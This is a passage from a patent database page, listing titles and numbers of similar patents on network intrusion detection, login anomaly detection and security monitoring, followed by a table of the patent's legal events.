| US10885165B2 (en) | Account monitoring | |
| CN108881211B (en) | Illegal external connection detection method and device | |
| CN106789935B (en) | Terminal abnormity detection method | |
| CN108650225B (en) | Remote safety monitoring equipment, system and remote safety monitoring method | |
| US20030084321A1 (en) | Node and mobile device for a mobile telecommunications network providing intrusion detection | |
| US20190044965A1 (en) | Systems and methods for discriminating between human and non-human interactions with computing devices on a computer network | |
| CN102769549A (en) | Network security monitoring method and device | |
| CN112163198B (en) | Host login security detection method, system, device and storage medium | |
| CN115801305B (en) | Network attack detection and identification method and related equipment | |
| CN112217777A (en) | Attack backtracking method and equipment | |
| GB2592132A (en) | Enterprise network threat detection | |
| CN117527412A (en) | Data security monitoring method and device | |
| CN110618977B (en) | Login anomaly detection method, device, storage medium and computer equipment | |
| CN110061854A (en) | A kind of non-boundary network intelligence operation management method and system | |
| CN118337540A (en) | Internet of things-based network intrusion attack recognition system and method | |
| Ghaleb et al. | A framework architecture for agentless cloud endpoint security monitoring | |
| CN114205169A (en) | Network security defense method, device and system | |
| RU186198U1 (en) | Host Level Intrusion Detector | |
| CN111259383A (en) | Safety management center system | |
| CN115830734B (en) | Method for preventing card from being punched instead of card and related equipment | |
| CN113573350B (en) | Risk monitoring method and device for wireless equipment | |
| CN117692158A (en) | Method, system, storage medium and computer equipment for identifying abnormal business access behaviors | |
| CN114124559B (en) | Host recognition method based on public key fingerprint | |
| US11956255B1 (en) | Recognizing successful cyberattacks based on subsequent benign activities of an attacker |
Legal Events
| Date | Code | Title | Description |
|---|---|---|---|
| PB01 | Publication | ||
| PB01 | Publication | ||
| SE01 | Entry into force of request for substantive examination | ||
| SE01 | Entry into force of request for substantive examination | ||
| GR01 | Patent grant | ||
| GR01 | Patent grant |